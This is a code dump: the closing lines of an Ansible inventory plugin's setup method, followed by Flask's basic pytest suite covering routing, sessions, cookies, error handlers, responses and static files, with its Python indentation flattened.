"User-Agent": "ansible %s Python %s"
% (ansible_version, python_version.split(" ", maxsplit=1)[0]),
"Content-type": "application/json",
}
self.cert = self.get_option("cert")
self.key = self.get_option("key")
self.ca_path = self.get_option("ca_path")
if token:
self.headers.update({"Authorization": "Token %s" % token})
# Filter and group_by options
self.group_by = self.get_option("group_by")
self.group_names_raw = self.get_option("group_names_raw")
self.query_filters = self.get_option("query_filters")
self.device_query_filters = self.get_option("device_query_filters")
self.vm_query_filters = self.get_option("vm_query_filters")
self.virtual_chassis_name = self.get_option("virtual_chassis_name")
self.dns_name = self.get_option("dns_name")
self.ansible_host_dns_name = self.get_option("ansible_host_dns_name")
self.racks = self.get_option("racks")
self.main()
|
test_basic.py
|
import gc
import re
import time
import uuid
import warnings
import weakref
from datetime import datetime
from platform import python_implementation
from threading import Thread
import pytest
import werkzeug.serving
from werkzeug.exceptions import BadRequest
from werkzeug.exceptions import Forbidden
from werkzeug.exceptions import NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import flask
require_cpython_gc = pytest.mark.skipif(
python_implementation() != "CPython",
reason="Requires CPython GC behavior",
)
def test_options_work(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
assert rv.data == b""
def test_options_on_multiple_rules(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
@app.route("/", methods=["PUT"])
def index_put():
return "Aha!"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST", "PUT"]
@pytest.mark.parametrize("method", ["get", "post", "put", "delete", "patch"])
def test_method_route(app, client, method):
method_route = getattr(app, method)
client_method = getattr(client, method)
@method_route("/")
def hello():
return "Hello"
assert client_method("/").data == b"Hello"
def test_method_route_no_methods(app):
with pytest.raises(TypeError):
app.get("/", methods=["GET", "POST"])
def test_provide_automatic_options_attr():
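    # provide_automatic_options=False should disable the implicit OPTIONS
    # handling for the view, so an OPTIONS request is answered with 405.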
app = flask.Flask(__name__)
def index():
return "Hello World!"
index.provide_automatic_options = False
app.route("/")(index)
rv = app.test_client().open("/", method="OPTIONS")
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return "Hello World!"
index2.provide_automatic_options = True
app.route("/", methods=["OPTIONS"])(index2)
rv = app.test_client().open("/", method="OPTIONS")
assert sorted(rv.allow) == ["OPTIONS"]
def test_provide_automatic_options_kwarg(app, client):
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule("/", view_func=index, provide_automatic_options=False)
app.add_url_rule(
"/more",
view_func=more,
methods=["GET", "POST"],
provide_automatic_options=False,
)
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD"]
rv = client.open("/", method="OPTIONS")
assert rv.status_code == 405
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "POST"]
rv = client.open("/more", method="OPTIONS")
assert rv.status_code == 405
def test_request_dispatching(app, client):
@app.route("/")
def index():
return flask.request.method
@app.route("/more", methods=["GET", "POST"])
def more():
return flask.request.method
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
def test_disallow_string_for_allowed_methods(app):
with pytest.raises(TypeError):
@app.route("/", methods="GET POST")
def index():
return "Hey"
def test_url_mapping(app, client):
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule("/", "index", index)
app.add_url_rule("/more", "more", more, methods=["GET", "POST"])
    # Issue 1288: Test that automatic OPTIONS handling is not added
    # when a non-uppercase 'options' is given in methods
app.add_url_rule("/options", "options", options, methods=["options"])
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
rv = client.open("/options", method="OPTIONS")
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
def bar():
return "bar"
def index():
return "index"
app.view_functions["bar"] = bar
app.view_functions["index"] = index
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_endpoint_decorator(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
@app.endpoint("bar")
def bar():
return "bar"
@app.endpoint("index")
def index():
return "index"
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_session(app, client):
@app.route("/set", methods=["POST"])
def set():
assert not flask.session.accessed
assert not flask.session.modified
flask.session["value"] = flask.request.form["value"]
assert flask.session.accessed
assert flask.session.modified
return "value set"
@app.route("/get")
def get():
assert not flask.session.accessed
assert not flask.session.modified
v = flask.session.get("value", "None")
assert flask.session.accessed
assert not flask.session.modified
return v
assert client.post("/set", data={"value": "42"}).data == b"value set"
assert client.get("/get").data == b"42"
def test_session_using_server_name(app, client):
app.config.update(SERVER_NAME="example.com")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_and_port(app, client):
app.config.update(SERVER_NAME="example.com:8080")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_port_and_path(app, client):
app.config.update(SERVER_NAME="example.com:8080", APPLICATION_ROOT="/foo")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/foo")
assert "domain=example.com" in rv.headers["set-cookie"].lower()
assert "path=/foo" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_application_root(app, client):
class PrefixPathMiddleware:
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ["SCRIPT_NAME"] = self.prefix
return self.app(environ, start_response)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, "/bar")
app.config.update(APPLICATION_ROOT="/bar")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "path=/bar" in rv.headers["set-cookie"].lower()
def test_session_using_session_settings(app, client):
app.config.update(
SERVER_NAME="www.example.com:8080",
APPLICATION_ROOT="/test",
SESSION_COOKIE_DOMAIN=".example.com",
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_SAMESITE="Lax",
SESSION_COOKIE_PATH="/",
)
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "httponly" not in cookie
assert "samesite" in cookie
@app.route("/clear")
def clear():
flask.session.pop("testing", None)
return "Goodbye World"
rv = client.get("/clear", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "session=;" in cookie
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "samesite" in cookie
def test_session_using_samesite_attribute(app, client):
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
app.config.update(SESSION_COOKIE_SAMESITE="invalid")
with pytest.raises(ValueError):
client.get("/")
app.config.update(SESSION_COOKIE_SAMESITE=None)
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite" not in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Strict")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=strict" in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Lax")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=lax" in cookie
def test_session_localhost_warning(recwarn, app, client):
app.config.update(SERVER_NAME="localhost:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://localhost:5000/")
assert "domain" not in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "'localhost' is not a valid cookie domain" in str(w.message)
def test_session_ip_warning(recwarn, app, client):
app.config.update(SERVER_NAME="127.0.0.1:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://127.0.0.1:5000/")
assert "domain=127.0.0.1" in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "cookie domain is an IP" in str(w.message)
def test_missing_session(app):
app.secret_key = None
def expect_exception(f, *args, **kwargs):
e = pytest.raises(RuntimeError, f, *args, **kwargs)
assert e.value.args and "session is unavailable" in e.value.args[0]
with app.test_request_context():
assert flask.session.get("missing_key") is None
expect_exception(flask.session.__setitem__, "foo", 42)
expect_exception(flask.session.pop, "foo")
def test_session_expiration(app, client):
permanent = True
@app.route("/")
def index():
flask.session["test"] = 42
flask.session.permanent = permanent
return ""
@app.route("/test")
def test():
return str(flask.session.permanent)
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"(?i)\bexpires=([^;]+)", rv.headers["set-cookie"])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get("/test")
assert rv.data == b"True"
permanent = False
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"\bexpires=([^;]+)", rv.headers["set-cookie"])
assert match is None
def test_session_stored_last(app, client):
@app.after_request
def modify_session(response):
flask.session["foo"] = 42
return response
@app.route("/")
def dump_session_contents():
return repr(flask.session.get("foo"))
assert client.get("/").data == b"None"
assert client.get("/").data == b"42"
def test_session_special_types(app, client):
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.route("/")
def dump_session_contents():
flask.session["t"] = (1, 2, 3)
flask.session["b"] = b"\xff"
flask.session["m"] = flask.Markup("<html>")
flask.session["u"] = the_uuid
flask.session["d"] = now
flask.session["t_tag"] = {" t": "not-a-tuple"}
flask.session["di_t_tag"] = {" t__": "not-a-tuple"}
flask.session["di_tag"] = {" di": "not-a-dict"}
return "", 204
with client:
client.get("/")
s = flask.session
assert s["t"] == (1, 2, 3)
assert type(s["b"]) == bytes
assert s["b"] == b"\xff"
assert type(s["m"]) == flask.Markup
assert s["m"] == flask.Markup("<html>")
assert s["u"] == the_uuid
assert s["d"] == now
assert s["t_tag"] == {" t": "not-a-tuple"}
assert s["di_t_tag"] == {" t__": "not-a-tuple"}
assert s["di_tag"] == {" di": "not-a-dict"}
def test_session_cookie_setting(app):
is_permanent = True
@app.route("/bump")
def bump():
rv = flask.session["foo"] = flask.session.get("foo", 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route("/read")
def read():
return str(flask.session.get("foo", 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get("/bump").data == b"1"
assert c.get("/bump").data == b"2"
assert c.get("/bump").data == b"3"
rv = c.get("/read")
set_cookie = rv.headers.get("set-cookie")
assert (set_cookie is not None) == expect_header
assert rv.data == b"3"
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=True)
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
def test_session_vary_cookie(app, client):
@app.route("/set")
def set_session():
flask.session["test"] = "test"
return ""
@app.route("/get")
def get():
return flask.session.get("test")
@app.route("/getitem")
def getitem():
return flask.session["test"]
@app.route("/setdefault")
def setdefault():
return flask.session.setdefault("test", "default")
@app.route("/vary-cookie-header-set")
def vary_cookie_header_set():
response = flask.Response()
response.vary.add("Cookie")
flask.session["test"] = "test"
return response
@app.route("/vary-header-set")
def vary_header_set():
response = flask.Response()
response.vary.update(("Accept-Encoding", "Accept-Language"))
flask.session["test"] = "test"
return response
@app.route("/no-vary-header")
def no_vary_header():
return ""
def expect(path, header_value="Cookie"):
rv = client.get(path)
if header_value:
# The 'Vary' key should exist in the headers only once.
assert len(rv.headers.get_all("Vary")) == 1
assert rv.headers["Vary"] == header_value
else:
assert "Vary" not in rv.headers
expect("/set")
expect("/get")
expect("/getitem")
expect("/setdefault")
expect("/vary-cookie-header-set")
expect("/vary-header-set", "Accept-Encoding, Accept-Language, Cookie")
expect("/no-vary-header", None)
def test_flashes(app, req_ctx):
assert not flask.session.modified
flask.flash("Zap")
flask.session.modified = False
flask.flash("Zip")
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ["Zap", "Zip"]
def test_extended_flashing(app):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
@app.route("/")
def index():
flask.flash("Hello World")
flask.flash("Hello World", "error")
flask.flash(flask.Markup("<em>Testing</em>"), "warning")
return ""
@app.route("/test/")
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
"Hello World",
"Hello World",
flask.Markup("<em>Testing</em>"),
]
return ""
@app.route("/test_with_categories/")
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
("message", "Hello World"),
("error", "Hello World"),
("warning", flask.Markup("<em>Testing</em>")),
]
return ""
@app.route("/test_filter/")
def test_filter():
messages = flask.get_flashed_messages(
category_filter=["message"], with_categories=True
)
assert list(messages) == [("message", "Hello World")]
return ""
@app.route("/test_filters/")
def test_filters():
messages = flask.get_flashed_messages(
category_filter=["message", "warning"], with_categories=True
)
assert list(messages) == [
("message", "Hello World"),
("warning", flask.Markup("<em>Testing</em>")),
]
return ""
@app.route("/test_filters_without_returning_categories/")
def test_filters2():
messages = flask.get_flashed_messages(category_filter=["message", "warning"])
assert len(messages) == 2
assert messages[0] == "Hello World"
assert messages[1] == flask.Markup("<em>Testing</em>")
return ""
# Create new test client on each test to clean flashed messages.
client = app.test_client()
client.get("/")
client.get("/test_with_categories/")
client = app.test_client()
client.get("/")
client.get("/test_filter/")
client = app.test_client()
client.get("/")
client.get("/test_filters/")
client = app.test_client()
client.get("/")
client.get("/test_filters_without_returning_categories/")
def test_request_processing(app, client):
evts = []
@app.before_request
def before_request():
evts.append("before")
@app.after_request
def after_request(response):
response.data += b"|after"
evts.append("after")
return response
@app.route("/")
def index():
assert "before" in evts
assert "after" not in evts
return "request"
assert "after" not in evts
rv = client.get("/").data
assert "after" in evts
assert rv == b"request|after"
def test_request_preprocessing_early_return(app, client):
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route("/")
def index():
evts.append("index")
return "damnit"
rv = client.get("/").data.strip()
assert rv == b"hello"
assert evts == [1, 2]
def test_after_request_processing(app, client):
@app.route("/")
def index():
@flask.after_this_request
def foo(response):
response.headers["X-Foo"] = "a header"
return response
return "Test"
resp = client.get("/")
assert resp.status_code == 200
assert resp.headers["X-Foo"] == "a header"
def test_teardown_request_handler(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_debug_mode(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_error(app, client):
called = []
app.testing = False
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.route("/")
def fails():
1 // 0
rv = client.get("/")
assert rv.status_code == 500
assert b"Internal Server Error" in rv.data
assert len(called) == 2
def test_before_after_request_order(app, client):
called = []
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route("/")
def index():
return "42"
rv = client.get("/")
assert rv.data == b"42"
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling(app, client):
app.testing = False
@app.errorhandler(404)
def not_found(e):
return "not found", 404
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.errorhandler(Forbidden)
def forbidden(e):
return "forbidden", 403
@app.route("/")
def index():
flask.abort(404)
@app.route("/error")
def error():
1 // 0
@app.route("/forbidden")
def error2():
flask.abort(403)
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"not found"
rv = client.get("/error")
assert rv.status_code == 500
assert b"internal server error" == rv.data
rv = client.get("/forbidden")
assert rv.status_code == 403
assert b"forbidden" == rv.data
def test_error_handler_unknown_code(app):
with pytest.raises(KeyError) as exc_info:
app.register_error_handler(999, lambda e: ("999", 999))
assert "Use a subclass" in exc_info.value.args[0]
def test_error_handling_processing(app, client):
app.testing = False
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.route("/")
def broken_func():
1 // 0
@app.after_request
def after_request(resp):
resp.mimetype = "text/x-special"
return resp
resp = client.get("/")
assert resp.mimetype == "text/x-special"
assert resp.data == b"internal server error"
def test_baseexception_error_handling(app, client):
app.testing = False
@app.route("/")
def broken_func():
raise KeyboardInterrupt()
with pytest.raises(KeyboardInterrupt):
client.get("/")
ctx = flask._request_ctx_stack.top
assert ctx.preserved
assert type(ctx._preserved_exc) is KeyboardInterrupt
def test_before_request_and_routing_errors(app, client):
@app.before_request
def attach_something():
flask.g.something = "value"
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"value"
def test_user_error_handling(app, client):
class MyException(Exception):
pass
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return "42"
@app.route("/")
def index():
raise MyException()
assert client.get("/").data == b"42"
def test_http_error_subclass_handling(app, client):
class ForbiddenSubclass(Forbidden):
pass
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return "banana"
@app.errorhandler(403)
def handle_403(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return "apple"
@app.route("/1")
def index1():
raise ForbiddenSubclass()
@app.route("/2")
def index2():
flask.abort(403)
@app.route("/3")
def index3():
raise Forbidden()
assert client.get("/1").data == b"banana"
assert client.get("/2").data == b"apple"
assert client.get("/3").data == b"apple"
def test_errorhandler_precedence(app, client):
class E1(Exception):
pass
class E2(Exception):
pass
class E3(E1, E2):
pass
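    # E3 inherits from both E1 and E2; only E2 and the generic Exception have
    # handlers registered, and the more specific E2 handler should win for E3.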
@app.errorhandler(E2)
def handle_e2(e):
return "E2"
@app.errorhandler(Exception)
def handle_exception(e):
return "Exception"
@app.route("/E1")
def raise_e1():
raise E1
@app.route("/E3")
def raise_e3():
raise E3
rv = client.get("/E1")
assert rv.data == b"Exception"
rv = client.get("/E3")
assert rv.data == b"E2"
def test_trapping_of_bad_request_key_errors(app, client):
@app.route("/key")
def fail():
flask.request.form["missing_key"]
@app.route("/abort")
def allow_abort():
flask.abort(400)
rv = client.get("/key")
assert rv.status_code == 400
assert b"missing_key" not in rv.data
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = True
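    # With debug enabled, the BadRequestKeyError for the missing form key propagates
    # to the test client instead of becoming a 400 response, exposing the key name.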
with pytest.raises(KeyError) as e:
client.get("/key")
assert e.errisinstance(BadRequest)
assert "missing_key" in e.value.get_description()
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = False
app.config["TRAP_BAD_REQUEST_ERRORS"] = True
with pytest.raises(KeyError):
client.get("/key")
with pytest.raises(BadRequest):
client.get("/abort")
def test_trapping_of_all_http_exceptions(app, client):
app.config["TRAP_HTTP_EXCEPTIONS"] = True
@app.route("/fail")
def fail():
flask.abort(404)
with pytest.raises(NotFound):
client.get("/fail")
def test_error_handler_after_processor_error(app, client):
app.testing = False
@app.before_request
def before_request():
if _trigger == "before":
1 // 0
@app.after_request
def after_request(response):
if _trigger == "after":
1 // 0
return response
@app.route("/")
def index():
return "Foo"
@app.errorhandler(500)
def internal_server_error(e):
return "Hello Server Error", 500
for _trigger in "before", "after":
rv = client.get("/")
assert rv.status_code == 500
assert rv.data == b"Hello Server Error"
def test_enctype_debug_helper(app, client):
from flask.debughelpers import DebugFilesKeyError
app.debug = True
@app.route("/fail", methods=["POST"])
def index():
return flask.request.files["foo"].filename
    # The with statement is important: without it we would leave an exception
    # on the stack, which could negatively affect other tests.
with client:
with pytest.raises(DebugFilesKeyError) as e:
client.post("/fail", data={"foo": "index.txt"})
assert "no file contents were transmitted" in str(e.value)
assert "This was submitted: 'index.txt'" in str(e.value)
def test_response_types(app, client):
@app.route("/text")
def from_text():
return "Hällo Wörld"
@app.route("/bytes")
def from_bytes():
return "Hällo Wörld".encode()
@app.route("/full_tuple")
def from_full_tuple():
return (
"Meh",
400,
{"X-Foo": "Testing", "Content-Type": "text/plain; charset=utf-8"},
)
@app.route("/text_headers")
def from_text_headers():
return "Hello", {"X-Foo": "Test", "Content-Type": "text/plain; charset=utf-8"}
@app.route("/text_status")
def from_text_status():
return "Hi, status!", 400
@app.route("/response_headers")
def from_response_headers():
return (
flask.Response(
"Hello world", 404, {"Content-Type": "text/html", "X-Foo": "Baz"}
),
{"Content-Type": "text/plain", "X-Foo": "Bar", "X-Bar": "Foo"},
)
@app.route("/response_status")
def from_response_status():
return app.response_class("Hello world", 400), 500
@app.route("/wsgi")
def from_wsgi():
return NotFound()
@app.route("/dict")
def from_dict():
return {"foo": "bar"}, 201
assert client.get("/text").data == "Hällo Wörld".encode()
assert client.get("/bytes").data == "Hällo Wörld".encode()
rv = client.get("/full_tuple")
assert rv.data == b"Meh"
assert rv.headers["X-Foo"] == "Testing"
assert rv.status_code == 400
assert rv.mimetype == "text/plain"
rv = client.get("/text_headers")
assert rv.data == b"Hello"
assert rv.headers["X-Foo"] == "Test"
assert rv.status_code == 200
assert rv.mimetype == "text/plain"
rv = client.get("/text_status")
assert rv.data == b"Hi, status!"
assert rv.status_code == 400
assert rv.mimetype == "text/html"
rv = client.get("/response_headers")
assert rv.data == b"Hello world"
assert rv.content_type == "text/plain"
assert rv.headers.getlist("X-Foo") == ["Bar"]
assert rv.headers["X-Bar"] == "Foo"
assert rv.status_code == 404
rv = client.get("/response_status")
assert rv.data == b"Hello world"
assert rv.status_code == 500
rv = client.get("/wsgi")
assert b"Not Found" in rv.data
assert rv.status_code == 404
rv = client.get("/dict")
assert rv.json == {"foo": "bar"}
assert rv.status_code == 201
def test_response_type_errors():
app = flask.Flask(__name__)
app.testing = True
@app.route("/none")
def from_none():
pass
@app.route("/small_tuple")
def from_small_tuple():
return ("Hello",)
@app.route("/large_tuple")
def from_large_tuple():
return "Hello", 234, {"X-Foo": "Bar"}, "???"
@app.route("/bad_type")
def from_bad_type():
return True
@app.route("/bad_wsgi")
def from_bad_wsgi():
return lambda: None
c = app.test_client()
with pytest.raises(TypeError) as e:
c.get("/none")
assert "returned None" in str(e.value)
assert "from_none" in str(e.value)
with pytest.raises(TypeError) as e:
c.get("/small_tuple")
assert "tuple must have the form" in str(e.value)
pytest.raises(TypeError, c.get, "/large_tuple")
with pytest.raises(TypeError) as e:
c.get("/bad_type")
assert "it was a bool" in str(e.value)
pytest.raises(TypeError, c.get, "/bad_wsgi")
def test_make_response(app, req_ctx):
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response("Awesome")
assert rv.status_code == 200
assert rv.data == b"Awesome"
assert rv.mimetype == "text/html"
rv = flask.make_response("W00t", 404)
assert rv.status_code == 404
assert rv.data == b"W00t"
assert rv.mimetype == "text/html"
def test_make_response_with_response_instance(app, req_ctx):
rv = flask.make_response(flask.jsonify({"msg": "W00t"}), 400)
assert rv.status_code == 400
assert rv.data == b'{"msg":"W00t"}\n'
assert rv.mimetype == "application/json"
rv = flask.make_response(flask.Response(""), 400)
assert rv.status_code == 400
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response(
flask.Response("", headers={"Content-Type": "text/html"}),
400,
[("X-Foo", "bar")],
)
assert rv.status_code == 400
assert rv.headers["Content-Type"] == "text/html"
assert rv.headers["X-Foo"] == "bar"
def test_jsonify_no_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
rv = flask.make_response(flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
compressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
pretty_response = (
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
)
rv = flask.make_response(flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_jsonify_mimetype(app, req_ctx):
app.config.update({"JSONIFY_MIMETYPE": "application/vnd.api+json"})
msg = {"msg": {"submsg": "W00t"}}
rv = flask.make_response(flask.jsonify(msg), 200)
assert rv.mimetype == "application/vnd.api+json"
def test_json_dump_dataclass(app, req_ctx):
from dataclasses import make_dataclass
Data = make_dataclass("Data", [("name", str)])
value = flask.json.dumps(Data("Flask"), app=app)
value = flask.json.loads(value, app=app)
assert value == {"name": "Flask"}
def test_jsonify_args_and_kwargs_check(app, req_ctx):
with pytest.raises(TypeError) as e:
flask.jsonify("fake args", kwargs="fake")
assert "behavior undefined" in str(e.value)
def test_url_generation(app, req_ctx):
@app.route("/hello/<name>", methods=["POST"])
def hello():
pass
assert flask.url_for("hello", name="test x") == "/hello/test%20x"
assert (
flask.url_for("hello", name="test x", _external=True)
== "http://localhost/hello/test%20x"
)
def test_build_error_handler(app):
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "spam")
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for("spam")
except BuildError as err:
error = err
try:
raise RuntimeError("Test case where BuildError is not current.")
except RuntimeError:
pytest.raises(BuildError, app.handle_url_build_error, error, "spam", {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return "/test_handler/"
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for("spam") == "/test_handler/"
def test_build_error_handler_reraise(app):
# Test a custom handler which reraises the BuildError
def handler_raises_build_error(error, endpoint, values):
raise error
app.url_build_error_handlers.append(handler_raises_build_error)
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "not.existing")
def test_url_for_passes_special_values_to_build_error_handler(app):
@app.url_build_error_handlers.append
def handler(error, endpoint, values):
assert values == {
"_external": False,
"_anchor": None,
"_method": None,
"_scheme": None,
}
return "handled"
with app.test_request_context():
flask.url_for("/")
def test_static_files(app, client):
rv = client.get("/static/index.html")
assert rv.status_code == 200
assert rv.data.strip() == b"<h1>Hello World!</h1>"
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/static/index.html"
rv.close()
def test_static_url_path():
app = flask.Flask(__name__, static_url_path="/foo")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_path_with_ending_slash():
app = flask.Flask(__name__, static_url_path="/foo/")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_empty_path(app):
app = flask.Flask(__name__, static_folder="", static_url_path="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_url_empty_path_default(app):
app = flask.Flask(__name__, static_folder="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
